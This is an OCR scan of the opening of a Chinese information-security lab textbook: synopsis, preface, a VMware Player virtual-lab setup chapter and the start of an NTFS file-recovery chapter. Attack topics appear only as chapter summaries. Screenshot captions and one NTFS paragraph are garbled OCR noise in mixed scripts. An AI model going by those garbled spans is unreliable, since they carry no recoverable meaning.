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内 容 简 介 


本 书 以 教育 部 (信息 安全 类 专业 指导 性 专业 规范 ) 所 列 知 识 点 为 基础 ,以 构建 信息 系统 安全 保障 体 
系 为 目标 ,从 信息 系统 体系 结构 角度 ,按照 物理 安全 、 操 作 系 统 安全 ,数据库 安全 、 网 络 安 全 、 应 用 系统 安 
全 的 主线 组 织 实 验 内 容 。 全 书 共 11 章 , 每 章 均 有 实验 原理 ,实验 步骤 的 详细 介绍 ,并 通过 练习 题 进一步 
拓展 知识 。 第 1 章 介绍 了 信息 系统 安全 实验 环境 的 构建 ; 第 2 章 介绍 了 存储 介质 的 数据 恢复 和 安全 删 
除 技术 ; 第 3 章 介 绍 了 针对 口令 的 字典 攻击 、 暴 力 破解 .彩虹 表 破 解 等 方法 ; 第 4.5 章 分 别 介绍 
Windows, Linux 的 安全 机 制 和 配置 方法 ; 第 6 章 从 账户 管理 ,访问 控制 .备份 与 恢复 等 几 个 方面 介绍 了 
典型 数据 库 管理 系统 SQL Server 的 安全 配置 ; 第 7 章 介绍 了 常用 Web 服务 器 、FTP 服务 器 的 安全 配 
置 ; 第 8 章 针对 不 同 的 安全 需求 ,设计 了 主机 防火 墙 和 网 络 防 火 墙 实验 ; 第 9 章 介 绍 了 入 侵 检测 系统 安 
装 .配置 方法 ; 第 10 章 介 绍 了 软件 中 常见 的 缓冲 区 溢出 攻击 与 防护 方法 ; 第 11 章 设 计 了 SQL 注入 、 
XSS, 文件 上 传 .CSRF 等 常见 Web 应 用 攻击 和 防护 的 实验 。 
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随 着 计算 机 和 网 络 技 术 的 日 益 普及 和 广泛 应 用 ,各 类 信息 系统 在 社会 
生活 中 发 挥 着 越 来 越 重要 的 作用 ,部 分 信息 系统 已 经 成 为 国家 基础 设施 。 
与 此 同时 ,计算 机 信息 系统 面临 的 安全 形势 越 来 越 严峻 ,各 种 攻击 与 破坏 事 
件 屡见不鲜 ,这 些 攻击 与 破坏 事件 轻 则 干扰 人 们 的 日 常生 活 , 重 则 造成 巨大 
的 经 济 损失 ,甚至 威胁 到 国家 安全 。 没 有 网 络 安全 就 没有 国家 安全 ,为 建设 
网 络 强国 ,迫切 需要 一 批 深入 掌握 信息 系统 安全 技术 和 实践 技能 的 专业 技 
术 人 才 。 

确保 信息 系统 安全 是 一 个 整体 概念 ,解决 某 一 信息 安全 问题 通常 要 综 
合 考虑 硬件 .系统 软件 、 应 用 软件 、 管 理 等 多 层次 的 安全 问题 ,目前 已 有 的 信 
息 安全 方面 的 书籍 大 多 侧重 于 网 络 安全 ,而 专门 从 信息 系统 体系 结构 层面 
讲解 信息 安全 的 教材 较 少 ,不 利于 相关 课程 教学 的 实施 。 

本 书 的 教学 内 容 以 教育 部 《信息 安全 类 专业 指导 性 专业 规范 》 所 列 知识 
点 为 基础 ,以 构建 信息 系统 安全 保障 体系 为 目标 ,从 信息 系统 体系 结构 角 
度 ,按照 物理 安全 .操作 系统 安全 数据库 安全 、 网 络 安全 .应 用 系统 安全 的 
主线 组 织 实验 内 容 , 涉 及 保护 、 检 测 、 响 应 、 恢 复 等 安全 技术 和 机 制 。 本 书 实 
验 类 型 包括 验证 性 实验 、 设 计 性 实验 和 综合 性 实验 三 种 ,其 中 验证 性 实验 通 
过 原理 讲解 和 详细 的 操作 步骤 ,加 深 学 生 对 理论 和 技术 的 理解 。 设 计 性 实 
验 使 学 生 能 运用 所 学 的 理论 知识 和 实践 技能 ,在 实验 方案 的 设计 、 工 具 的 选 
择 等 方面 受到 比较 系统 的 训练 。 综 合 性 实验 的 主要 目的 是 培养 学 生 综 合 运 
用 知识 分 析 、 解 决 实际 问题 的 能 力 ,以 及 创新 能 力 。 

全 书 内 容 共 11 章 , 第 1 章 介 绍 了 信息 系统 安全 实验 环境 的 构建 ,设计 了 
虚拟 机 中 操作 系统 的 安装 及 配置 等 实验 内 容 ; 第 2 章 介 绍 了 存储 介质 的 数 
据 恢复 和 安全 删除 问题 ,设计 了 利用 常用 恢复 工具 恢复 已 删除 文件 的 实验 ， 
能 使 学 生 认 识 到 数据 删除 存在 的 安全 隐患 ,增强 数据 安全 删除 的 意识 ; 第 3 
章 介绍 信息 系统 各 层 软 件 都 面临 的 口令 安全 问题 ,设计 了 针对 操作 系统 、 服 
务 器 的 口令 破解 实验 ,使 学 生 掌握 字典 攻击 、 暴 力 破解 .彩虹 表 破 解 等 常用 
攻击 方法 ,认识 到 确保 口令 安全 的 重要 性 ; 第 4 章 和 第 5 章 分 别 介绍 
Windows, Linux 的 安全 机 制 和 配置 方法 ,让 学 生 认识 到 确保 操作 系统 的 安 
全 是 确保 所 有 软件 安全 的 基础 ,要 从 合理 配置 口令 策略 、 锁 定 策略 、 审 核 策 
略 等 几 个 方面 筑 牢 操作 系统 的 安全 ; 第 6 章 关注 典型 数据 库 管 理 系 统 SQL 
Server 的 安全 ,从 账户 管理 .访问 控制 ,备份 与 恢复 等 几 个 方面 介绍 数据 库 
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安全 配置 方法 ; 第 7 章 关 注 常 用 Web 服务 器 .FTP 服务 器 的 安全 ,分 别 设 计 了 Windows 
IIS Web 服务 器 、FTP 服务 器 以 及 Linux 下 Apache 服务 器 的 安全 配置 相关 的 实验 ; 第 8 
章 针对 不 同 的 安全 需求 ,设计 了 主机 防火 墙 和 网 络 防火 墙 实验 ,使 学 生 深刻 认识 到 防火 墙 
的 作用 ,掌握 防火 墙 的 部 署 和 配置 方法 ; 第 9 章 介 绍 入 侵 检测 系统 的 原理 ,设计 了 入 侵 检 
测 系统 安装 、 配 置 实验 ,使 学 生 深刻 理解 入 侵 检 测 的 作用 ; 第 10 章 介绍 软件 中 常见 的 缓 
冲 区 溢出 攻击 原理 ,分 别 设 计 了 Windows 平台 缓冲 滋 出 攻击 Linux 平台 缓冲 溢出 攻击 
实验 ,使 学 生 认识 到 两 种 平台 攻击 的 差异 ; 第 11 章 介绍 Web 应 用 面临 的 主要 安全 威胁 ， 
设计 了 SQL 注入 .XSS 文件 上 传 .CSREF 等 常见 攻击 的 实验 ,使 学 生理 解 攻 击 原理 ,掌握 
防范 措施 。 

本 书 是 作者 在 信息 系统 安全 领域 的 教学 .科研 实践 的 基础 上 ,针对 高 等 学 校 信息 安全 
相关 专业 的 教学 特点 和 能 力 需求 ,为 全 面 提高 学 生 实践 能 力 而 编写 的 一 本 实验 指导 教材 。 
本 书 可 以 作为 信息 安全 专业 、 信 息 对 抗 专 业 、 计 算 机 专业 ,信息 工 程 专业 以 及 其 他 相关 专 
业 的 本 科 生 和 研究 生 教材 ,也 可 作为 网 络 信息 安全 领域 的 科技 人 员 与 信息 系统 安全 管理 
员 的 参考 书 。 

参与 本 书 编写 的 人 员 有 陈 菠 .于 输 、 王 金 双 \ 赵 敏 , 其 中 陈 萍 提出 了 教材 的 编写 大 纲 ， 
编写 了 其 中 第 2.、3、4、5、6、7、11 章 , 于 输 编 写 了 第 1.8.9 章 , 赵 敏 编 写 了 第 10 章 , 王 金 双 
对 本 书 编写 提出 了 建设 性 的 意见 和 技术 支持 ,全 书 由 陈 萍 统 稿 ,由 王 金 双 审 校 。 

本 书 设计 的 所 有 实验 都 可 在 单机 上 进行 ,无 须 复杂 的 硬件 环境 支持 ,读者 既 可 在 实验 
室 集中 学 习 , 也 可 在 个 人 主机 上 自由 学 习 。 

信息 安全 技术 发 展 迅 镍 ,限于 作者 水 平 , 书 中 不 足 之 处 在 所 难免 ,恳请 读者 批评 指正 。 
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1.1 信息 系统 安全 虚拟 化 实验 环境 


“信息 系统 安全 ?是 一 门 实践 性 很 强 的 课程 ,实验 对 于 理解 和 掌握 信息 系统 安全 技术 
具有 十 分 重要 的 作用 。 为 了 在 实验 中 逼真 复 现 各 种 信息 系统 安全 威胁 ,要 根据 实验 内 容 
动态 部 署 网 络 和 主机 系统 环境 。 直 接 通过 PC 机 路由器、 交换 机 等 来 构建 实验 环境 成 本 
高 .配置 复杂 ,另外 实验 中 涉及 的 病毒 ,木马 等 软件 稍 有 不 慎 很 容易 造成 泛滥 和 失控 ,从 而 
影响 实际 网 络 环境 中 各 种 正常 业务 的 开展 。 因 而 信息 系统 安全 实验 环境 应 该 是 可 控 、 易 
配置 的 : 可 控 要 求 信 息 系统 安全 实验 带 来 的 影响 可 被 控制 在 一 定 的 范围 ,不 会 对 实验 环 
境 造成 破坏 ; 易 配置 要 求实 验 环 境 配置 方便 ,实验 环境 可 以 再 现 以 方便 重复 进行 实验 。 随 
着 虚拟 化 技术 的 发 展 ,在 一 台 高 性 能 主机 上 可 以 生成 多 台 虚 拟 机 (Virtual Machine, VM) 并 
可 构建 灵活 的 虚拟 网 络 ,安全 可 控 、 易 于 操作 。 因 此 ,本 教材 采用 虚拟 化 技术 构建 实验 环境 。 


1.1.1 虚拟 化 实验 环境 的 优点 


利用 虚拟 化 技术 可 以 生成 与 真实 主机 几乎 一 模 一 样 的 虚拟 机 ,只 要 物理 计算 机 硬件 
资源 充足 ,可 以 在 一 台 物 理 计算 机 上 建立 多 台 虚 拟 机 ,这 些 虚 拟 机 各 自 拥 有 自己 独立 的 
CPU 内存、 硬盘 .光驱 等 ,可 以 像 使 用 物理 计算 机 一 样 对 它们 进行 分 区 、 格 式 化 、 安 装 操 
作 系 统 等 操作 。 与 一 台 计算 机 上 直接 安装 多 个 操作 系统 不 同 , 多 台 虚 拟 机 可 以 同时 运行 ， 
意味 着 多 个 操作 系统 可 以 同时 运行、 随意 切换 。 多 台 虚 拟 机 之 间或 者 虚拟 机 与 主机 之 间 
还 可 以 通过 TCP/IP 连接 构建 网 络 。 采 用 虚拟 化 技术 构建 信息 系统 安全 实验 环境 具有 以 
下 优点 。 

(1) 通过 软件 的 方式 逻辑 切 分 服务 器 资源 ,形成 统一 的 虚拟 资源 池 , 创 建 虚 拟 机 运行 
的 独立 环境 ,实现 物理 资源 和 资源 池 的 动态 共享 ,能 够 最 大 效能 地 发 挥 高 性 能 主机 的 资源 
利用 率 。 

(2) 可 在 一 人 台 主 机 上 生成 多 台 虚 拟 机 ,虚拟 机 之 间 相 互 隔离 、 互 不 影响 ,有 效 减 少 了 
实验 所 需 终端 设备 的 数量 ,降低 了 成 本 。 

(3) 对 虚拟 主机 的 集中 式 管理 可 以 大 大 减少 多 主机 之 间 协 调 通 信和 所 需要 的 时 间 , 提 
供 更 加 稳健 的 业务 连续 性 ,并 且 可 以 利用 虚拟 机 软件 提供 的 快照 功能 加 快 故 障 和 灾难 恢 
复 的 速度 ,从 而 提高 业务 系统 的 高 可 用 性 。 

(4) 配置 简单 ,灵活 性 强 , 对 不 同 操作 系统 的 安装 只 需要 简单 的 配置 就 可 以 完成 , 避 
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免 了 元 余 的 分 区 等 过 程 ,而 且 操作 系统 和 应 用 被 封装 成 虚拟 机 ,整个 虚拟 机 以 文件 形式 保 
存 , 便 于 进行 备份 .移动 和 复制 。 

(5) 易于 配置 实验 网 络 ,基于 桥接 (Bridge) 、 仅 主机 模式 (Host-only) 等 虚拟 机 网 卡 模 
式 , 可 以 非常 容易 构建 局 域 网 ,提供 实验 所 需 的 网 络 环 境 。 


1.1.2 常用 虚拟 化 软件 介绍 


当前 比较 流行 的 虚拟 化 软件 主要 有 Xen、Hyper-V、VirtualBox 及 VMware 等 。Xen 
是 剑桥 大 学 开发 的 开源 虚拟 机 监控 器 ,主要 应 用 于 服务 器 应 用 整合 .软件 开发 测试 .集群 
运算 等 。Hyper-V 是 微软 公司 提出 的 系统 管理 虚拟 化 技术 ,能 够 优化 基础 设置 ,提高 硬 
件 利 用 率 , 降 低 运作 成 本 ,为 用 户 提 供 成 本 效益 更 高 的 虚拟 化 基础 设施 。VirtualBox 是 
SUN Microsystems 公司 出 品 的 软件 ,简单 易 用 ,性 能 优异 ,其 独到 之 处 包括 远程 桌面 协 
EUSB 的 支持 等 。VMware 是 美国 VMware 公司 开发 的 虚拟 化 产品 系列 ,包括 
VMware Player, VMware Workstation, VMware Fusion, VMware Vsphere 等 ,在 虚拟 化 
和 云 计算 基础 架构 领域 处 于 全 球 领先 地 位 ,所 提供 的 经 客户 验证 的 解决 方案 可 通过 降低 
复杂 性 及 更 灵活 、 敏 捷 的 交付 服务 来 提高 IT 效率 。 

对 个 人 用 户 而 言 ,VMware Player 是 一 款 优秀 的 桌面 虚拟 化 软件 ,可 使 用 户 在 一 台 计 
算 机 上 创建 出 多 台 不 同 配置 的 虚拟 计算 机 ,安装 运行 不 同 的 操作 系统 和 应 用 系统 ,虚拟 机 
与 宿主 机 之 间 完 全 隔离 ,虚拟 机 内 部 的 操作 不 会 影响 宿主 机 的 状态 ,并 且 通 过 虚拟 交换 
机 、 虚 拟 网 卡 和 虚拟 网 络 连接 ,无 须 借 助 于 任何 网 络 实体 设备 ,就 能 把 多 台 虚 拟 机 和 计算 
机 连接 起 来 ,模拟 出 完整 的 网 络 环境 ,是 进行 开发 .测试 .部署 新 的 应 用 程序 的 最 佳 解决 方 
案 。 相 对 于 另 一 款 桌 面 虚 拟 化 软件 VMware Workstation 而 言 ,VMware Player 具有 体 
积 小 .操作 界面 清爽 简洁 .配置 简单 的 优点 ,更 适合 个 人 用 户 使 用 。 


1.2 虚拟 机 的 安装 与 配置 实验 


1.2.1 实验 目的 
使 学 生 掌握 虚拟 操作 系统 的 安装 与 配置 ,深入 了 解 信息 系统 安全 实验 环境 的 构建 。 
1.2.2 实验 内 容 及 环境 


1. 实验 内 容 

在 主机 上 安装 虚拟 化 软件 VMware Player 14, 在 此 基础 上 创建 虚拟 机 并 安装 操作 系 
统 , 进 行 网 络 配 置 ,实现 宿主 机 与 虚拟 机 之 间 的 网 络 通信 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 ; 虚拟 化 软件 VMware Player 14。 


1.2.3 实验 步骤 


1. 虚拟 化 软件 VMWare Player 14 的 安装 
CD 双击 VMWare Player 安装 包 进 行 安装 , 单 击 * 下 一 步 ?按钮 ,接受 安装 协议 后 , 单 
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击 “ 下 一 步 ” 按 钮 继续 安装 ,此 时 出 现 “ 安 装 路 径 选择 ”界面 ,如 图 1. 1 Bros ,选择 默认 安装 
路 径 或 自行 选择 安装 路 径 继续 安装 。 


Гав VMware Workstation 14 Player E n Cei m) 

к "p | 
ашу Fies (86) Ware re oye (ва. ) 

NU o enis per d | 


L-56 | T-N ] 取消 


图 1.1 VMWare Player 安装 路 径 选择 界面 


(2) 单 击 “下 一 步 "按钮 ,出 现 * 用 户 体 验 设置 界 面 ,如 图 1. 2 所 示 , 根 据 用 户 需 要 进 
行 设置 。 


用 户 体验 设置 
编辑 黑 认 设置 以 提高 您 的 用 户 体验 。 


启动 时 检查 产品 更 新 (C) 
i 


VMware Workstation 14Player 启动 时 ， 检 查 应 用 程序 和 已 安装 软件 组 件 是 


VMware 客户 体验 提升 计划 (CEIP) 将 向 VMware 提供 相 = 


[ юй ) 


图 1.2 VMWare Player 用 户 体验 设置 界面 


G) 单 击 “ 下 一 步 ”按钮 ,出 现 VMWare Player 快捷 方式 设置 界面 ,如 图 1. З 所 示 , 根 
据 用 户 需要 进行 设置 。 单 击 * 下 一 步 ? 按 钮 ,出 现 准备 安装 VMWare Player 的 界面 ,如 
图 1.4 所 示 , 单 击 “ 安 装 ”按钮 ,进入 VMWare Player 的 安装 过 程 。 
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Га vitare workstation 14 Payer RU iere 
快捷 方式 Rs 
选择 您 要 放 入 系统 的 快捷 方式 。 "p 
在 以 下 位 置 创建 VMware Workstation 14 Player 的 快捷 方式 : 
| Amo | 
同 开始 菜单 程序 文件 夫 G) (| 
(| | 
| 
上 一 步 @) | BON) 取消 I 
图 1.3 VMWare Player 快捷 方式 创建 界面 
П VMware Workstation 14 Player kea) 
已 准备 好 安装 VMware Workstation 14 Player "p | 
本 单 击 "上 一 步 查看 或 更 改 任何 安装 设置 。 单 击 " 取 消 ' 稻 出 向 | 
\ 
M 
Ё = == —— d 


图 1.4 安装 选择 界面 


(4) 等 待 几 分 钟 后 , VMWare Player 安装 成 功 ,出 现 安装 完成 界面 ,如 图 1.5 所 示 。 

2. 虚拟 操作 系统 的 安装 

(1) 运行 VMWare Player, 进 入 VMWare Player 主 界面 ,如 图 1.6 所 示 。 界 面 右 侧 
有 4 个 选项 ,分 别 是 创建 新 虚拟 机 、 打 开 虚 拟 机 、 升 级 到 VMWare Workstation Pro 和 帮助 。 
选择 “创建 新 虚拟 机 ”, 进 入 虚拟 机 创建 窗口 ,如 图 1. 7 所 示 ,选择 “ 稍 后 安装 操作 系统 ”。 

(2) 单 击 * 下 一 步 ?按钮 ,选择 安装 虚拟 机 操作 系统 类 型 ,如 图 1. 8 所 示 ,这 里 选择 操 
作 系 统 类 型 为 Microsoft Windows. 版 本 选择 Windows 7, 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 
图 1.9 所 示 的 界面 ,对 虚拟 机 命名 并 选择 虚拟 机 储存 位 置 。 
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кешеш] 


VMware Workstation 14 Player 安装 向 导 已 完成 


„1 , 


WORKSTATION 单 击 " 完 成 按钮 退出 安装 向 导 。 
PLAYER 


A 


图 1.5 安装 完成 界面 


pe | к; RH à — " 
欢迎 使 用 VMware Workstation 
14 Player 


创建 新 虚拟 机 (N) 
创新 虚拟 机 ， 该 虚拟 机 随后 桂 添 加 到 库 的 项 部。 


打开 虚拟 机 (O) 
打开 现 有 虚拟 机 ， 访 虚拟 机 随后 振 添加 开 库 的 顶部 * 


升级 到 VMware Workstation Pro(U) 
BRRR. 虚拟 网 络 管理 等 高 级 功能 。 


帮助 (E) 
查看 联机 帮助 。 


该 产品 未 获 许 可 ， 仅 授权 用 于 非 商业 用 途 。 如 果 用 于 商 
业 用 和 途 ， 请 购买 许可 证 。 立即 购买。 


图 1.6 VMWare Player X: t iii 
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虚拟 机 如 同 物 理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 


安装 来 源 : 
| “日 安装 程序 光盘 (D): 
[e ovo rw ah (0:) 7 


O SERE ROGRRM RE ScH (eoN: 2 
[Ci\users\esHi\Desktop\Hirens.BootCD.14.0\Hiren's.Bool ~) [ Ж 


© 稍 后 安装 操作 系统 (5)" 
创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 


ЕТТ < 上 一 步 (8) | [ps0 > 取消 


图 1.7 虚拟 机 创建 窗口 


选择 客户 机 操作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


客户 机 操作 系统 


© Microsoft Wndows(W) 
© шщ) 

© Novel NetWare(E) 

© Solar(S) 

©нж(о) 


版 本 (V) 
[Windows 7 了 | 


ЕТ < 上 =- 步 B) 取消 


图 1.8 操作 系统 类 型 选择 界面 
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命名 虚拟 机 
您 希望 该 虚拟 机 使 用 什么 名 称 ? 
虚拟 机 名 称 (V) 
[windows 7] 
Бя: 
C:\Windows 7 浏览 (R)… 


<Е—88) 取消 
图 1.9 虚拟 机 命名 及 存储 位 置 选择 界面 


G) 单 击 * 下 一 步 ? 按 钮 ,进入 如 图 1. 10 所 示 的 虚拟 机 最 大 磁盘 容量 配置 界面 ,根据 
实验 需要 分 配 虚 拟 机 的 最 大 磁盘 容量 。 这 里 采用 默认 分 配 的 最 大 磁盘 容量 60GB, 由 于 
文件 系统 往往 对 AGB 以 上 的 文件 复制 有 限制 ,因此 选择 “将 虚拟 磁盘 拆 分 成 多 个 文件 ”， 
可 以 更 轻松 地 在 计算 机 之 间 移 动 虚拟 机 。 


指定 磁盘 容量 


虚拟 机 的 硬盘 作为 一 个 或 杀 个 文件 存储 在 主机 的 物理 磁盘 中 。 这 些 文件 最 初 很 小 ， 随 着 您 
向 虚拟 机 中 添加 应 用 程序 、 文 件 和 数据 而 逐渐 交大 。 


| 最 大 磁盘 大 小 (GBX(S): Бо о] 
3991 Windows 7 的 建议 大 小 : 60 GB 


© 将 虚拟 磁盘 存储 为 单个 文件 (9) 
©) 将 虚拟 磁盘 拆 分 成 条 个 文件 (M) |) 
реак, 可 以 更 轻松 地 在 计算 机 之 间 移 动 虚拟 机 ， 但 可 能 会 降低 大 容量 磁盘 的 性 


Сав] <-668)) [m>] wa ) 


Р 1.10 分 配 虚拟 机 的 最 大 磁盘 容量 
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(4) 单 击 “ 下 一 步 ” 按 钮 ,进入 “ 自 定义 硬件 ”界面 ,如 图 1. 11 所 示 , 单 击 “ 自 定义 硬件 ” 
按钮 ,出 现 如 图 1. 12 所 示 的 硬件 配置 界面 ,根据 用 户 需 要 配置 硬件 ,例如 删除 不 需要 的 打 
印 机 等 ,注意 这 里 需要 设置 光驱 连接 选择 使 用 Windows 7 的 ISO 映像 文件 。 


已 准备 好 创建 虚拟 机 
单 击 完成 ORREN. 然后 可 以 安装 Windows 79 
将 使 用 下 列 设置 创建 虚拟 机 : 
名 称 : Windows 7 
位 置 : C:\Windows 7 
| [e Workstation 14.x 
| | 操作 系统 : Windows 7 
ий: 60 GB, 拆 分 
内 存 : 1024 МВ 
网 络 适配器 : NAT 
其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 


图 1.11 自 定义 硬件 界面 
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1.12 硬件 配置 界面 
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(5) 单 击 “确定 ”按钮 后 回 到 图 1. 11 所 示 界 面 , 单 击 “ 完 成 ”按钮 ,进入 VMWare 
Player 安装 主 界面 ,如 图 1. 13 所 示 , 单 击 “ 播 放 虚 拟 机 ”, 进 入 操作 系统 安装 流程 ,操作 系 


统 的 安装 过 程 与 在 实体 机 上 安装 操作 系统 流程 相同 。 
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Windows 7 
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操作 系统 : Windows 7 
版 本 : Workstation 14.x 虚拟 机 
RAM: 1GB 
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图 1.13 播放 虚拟 机 界面 


3. 虚拟 机 网 络 配 置 


虚拟 机 的 网 络 配 置 决定 了 虚拟 机 能 否 与 网 络 上 的 其 他 主机 进行 通信 , 单 击 虚拟 机 设 
置 ,选择 “网 络 适配器 " 即 可 对 虚拟 机 的 网 络 连接 模式 进行 配置 ,如 图 1. 14 所 示 ,网络 连接 
模式 主要 包含 桥接 模式 (Bridge) „МАТ 模式 (NAT) 和 仅 主机 模式 (Host-only)3 种 。 

CD 桥接 模式 (Bridge) : 在 此 模式 下 ,VMWare Player 虚拟 出 来 的 操作 系统 就 像 是 
局 域 网 中 的 独立 主机 ,可 以 访问 局 域 网 中 任何 一 台 主 机 。 前 提 条 件 是 手动 把 虚拟 操作 系 
统 的 网 络 地 址 配置 成 与 宿主 机 处 于 同一 网 段 的 TP 地 址 和 子 网 掩 码 。 

(2) МАТ 模式 (NAT): 在 此 模式 下 .虚拟 主机 系统 借助 网 络 地 址 转换 (Network 
Address Translation) 功 能 ,通过 宿主 机 所 在 的 网 络 来 访问 公 网 。 使 用 МАТ 模式 可 以 实 
现在 虚拟 主机 中 访问 Internet。NAT 模式 下 的 虚拟 系统 的 TCP/IP 配置 信息 是 由 
VMnet8(CNAT) 虚 拟 网 络 的 DHCP 服务 器 提供 的 ,无 法 进行 手工 修改 ,因此 虚拟 机 也 就 
无 法 与 本 地 局 域 网 中 的 其 他 主机 进行 通信 。 采 用 NAT 模式 的 最 大 优点 是 虚拟 机 接 人 
Internet 非常 简单 ,无 须 进行 任何 配置 ,只 需要 宿主 机 能 访问 Internet 即 可 。 
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图 1.14 虚拟 机 网 络 连接 配置 


G) 仅 主 机 模式 (Hostronly): 在 此 模式 下 ,虚拟 网 络 是 一 个 全 封闭 网 络 。 仅 主机 模 
式 (Host-only) 没 有 МАТ 服务 ,所 以 虚拟 机 不 能 接 入 到 Internet。 宿 主机 与 虚拟 机 之 间 
的 通信 和 是 通过 VMnetl 虚拟 网 卡 实现 的 。 使 用 仅 主 机 模式 (Host-only) 可 以 提高 内 网 的 
安全 性 。 

在 后 续 的 信息 系统 安全 实验 中 ,为 了 保证 宿主 机 与 虚拟 机 之 间 的 网 络 通信 ,把 虚拟 机 
的 网 络 连 接 模式 设 定 为 桥接 模式 (Bridge) ,并 设置 宿主 机 与 虚拟 机 的 IP 地 址 为 同一 网 
段 ,例如 宿主 机 的 IP 地 址 为 192. 168. 1. 10/24 ,虚拟 机 的 ІР 地 址 为 192. 168. 1. 20/24, 在 
宿主 机 中 运行 ping 命令 ,对 宿主 机 与 虚拟 机 之 间 的 网 络 连通 性 进行 验证 。 


1.3 & J й 


(1) 创建 一 个 虚拟 机 ,其 操作 系统 为 Ubuntu 14. 04,IP 地 址 为 191. 168. 1. 14 ,尝试 对 
其 进行 配置 ,并 与 宿主 机 和 1. 2 节 所 创建 的 虚拟 机 Windows 7 通过 局 域 网 实现 连接 ,最 
后 进行 验证 。 

(2) 在 配置 虚拟 机 Ubuntu 14. 04 时 ,尝试 给 虚拟 机 添加 3 块 网 卡 ,其 IP 地 址 分 别 为 
10. 10. 10. 1,192. 168. 1. 1 和 192. 168. 16. 16 ,并 确保 与 虚拟 机 Windows 7 的 网 络 连通 性 。 
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数据 恢复 与 安全 删除 


2.1 Ж Ж 


数据 是 信息 社会 非常 宝贵 的 资源 ,被 称 为 “21 世纪 的 石油 ,重要 数据 丢失 或 破坏 往 
往 会 造成 难以 弥补 的 损失 ,由 于 人 为 误 删除 操作 或 系统 故障 ,数据 丢失 的 现象 时 有 发 生 ， 
怎样 将 数据 恢复 出 来 成 为 至 关 重 要 的 问题 。 通 常 ,用 户 在 执行 文件 删除 操作 时 ,系统 只 是 
在 文件 分 配 表 内 的 该 文件 记录 中 设置 了 一 个 删除 标志 ,表示 该 文件 已 被 删除 ,文件 数据 仍 
然 保留 在 存储 介质 中 ,采用 专业 工具 可 以 将 数据 恢复 。 当 不 慎 将 硬盘 信息 删除 或 者 将 硬 
盘 误 格式 化 时 ,应 该 首先 关机 ,不 要 轻易 对 硬盘 执行 写 操作 ,否则 会 增加 数据 恢复 的 难度 ， 
待 重新 开机 后 ,再 使 用 数据 恢复 工具 来 恢复 硬盘 上 的 数据 。 

在 确实 需要 删除 某 些 文件 时 ,为 了 防止 被 别有用心 的 用 户 恢复 ,需要 采用 专业 工具 填 
充 删 除 空间 的 数据 以 覆盖 原 有 的 数据 信息 。 本 章 主 要 介绍 Windows NTFS (New 
Technology File System) 文 件 恢复 和 安全 删除 相关 实验 。 


2.2 NTFS 文件 结构 和 文件 恢复 原理 


2.2.1 NTFS 文 件 结构 


NTFS 是 Windows NT 以 及 之 后 的 Windows 2000, Windows XP, Windows Server 2003, 
Windows Server 2008, Windows Vista, Windows 7 等 版 本 的 标准 文件 系统 。NTFS 的 结 
构 与 FAT(File Allocaion Table) 系 列 完全 不 同 , 采 用 了 全 新 的 结构 和 管理 方式 ,无论 在 安 
全 性 还 是 在 可 恢复 性 方面 都 有 良好 的 表现 。 

NTFS 文件 系统 的 结构 以 卷 为 基础 , 卷 由 逻辑 分 区 组 成 。 卷 以 簇 为 最 小 存储 管理 单 
元 ,对 磁盘 空间 和 文件 对 象 进行 有 机 操作 。 簇 的 大 小 称 卷 因子 ,每 簇 可 按 需 要 分 配 1,2,4 
或 8 扇 区 ,每 扇 区 512 字 节 ,由 操作 系统 建立 分 区 时 格式 化 生成 。 当 分 区 空间 超过 2С 
H}, NTFS ЖА 8 ВХ. 

NTFS XAF R Н 18 ЖЕ БУ ЭП ДЕЗЕ SORS EGET TERR, OE EUER S E BUG f 
进行 顺序 编号 ,虚拟 簇 号 是 对 文件 占用 簇 的 编号 ,以 便于 引用 文件 中 的 数据 。NTFS 将 卷 
定义 为 4 个 区 域 : 分 区 引导 扇 区 \ 主 文件 表 、 系 统 文件 和 文件 数据 区 。 

分 区 引导 扇 区 位 于 卷 的 首 扇 区 ,包括 分 区 的 引导 程序 和 BPB(BIOS Parameter Block). 
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BPB 表 中 的 参数 是 在 建立 文件 系统 时 由 操作 系统 生成 的 ,系统 根据 BPB 中 参数 得 到 卷 的 
重要 信息 ,对 分 区 引导 扇 区 、 主 文件 表 、 文 件数 据 等 进行 卷 逻 辑 地 址 定位 。 如 果 BPB 参数 
ER , NTFS 无 法 完成 数据 的 定位 ,文件 系统 将 不 能 正常 使 用 。 

主 文件 表 MFT(Master File Table) 是 由 一 系列 文件 记录 组 成 ,与 文件 数据 区 中 的 文 
件 相 对 应 ,是 NTFS 的 控制 中 心 。NTFS 通过 文件 记录 来 描述 数据 文件 的 各 种 属性 并 确 
定 其 在 磁盘 上 的 存储 位 置 。MFT 的 前 16 个 文件 记录 属于 系统 文件 , 称 为 元 文件 ,用 于 存 
放 系 统 的 元 数据 。 元 文件 在 主 文件 表 中 地 址 固定 不 变 ,而 对 其 他 文件 和 文件 夹 的 文件 记 
录 在 主 文件 表 中 的 地 址 则 无 具体 要 求 。 

文件 记录 由 记录 头 、 属 性 列表 和 结束 标志 组 成 ,如 图 2. 1 所 示 , 文 件 记录 以 “46 49 4C 45” 为 
开始 标志 ,“FF FF FF FF” 为 结束 标志 ,大 小 为 1KB。NTFS 将 数据 文件 作为 属性 /属性 
值 的 集合 来 处 理 , 属 性 的 内 容 是 属性 值 ( 流 ) ,由 简单 字符 队列 组 成 。NTFS 并 不 对 文件 数 
据 进行 操作 ,而 通过 对 属性 流 读 写 来 对 文件 进行 创建 . 读 写 、 删 除 等 操作 。 


| 记录 头 部 memene] 结束 标志 | 空闲 | 


图 2.1 文件 记录 结构 


当 文件 和 文件 夹 的 数据 较 小 时 ,其 所 有 属性 和 属性 值 都 可 直接 存放 在 文件 记录 中 , 称 
为 常 驻 属性 。 当 文件 或 文件 夹 的 属性 太 大 而 不 能 直接 存放 在 文件 记录 中 时 , 称 为 非常 驻 
属性 ,NTFS 将 从 主 文件 表 之 外 的 磁盘 空间 中 为 非常 驻 属 性 值 分 配 存储 区 域 。NTFS ili 
过 “数据 运行 ”说 明文 件 在 文件 数据 区 簇 的 分 配 情况 ,由 多 个 运行 项 组 成 ,说 明文 件 的 分 段 
存储 信息 o 


2.2.2 NTFS 文件 恢复 


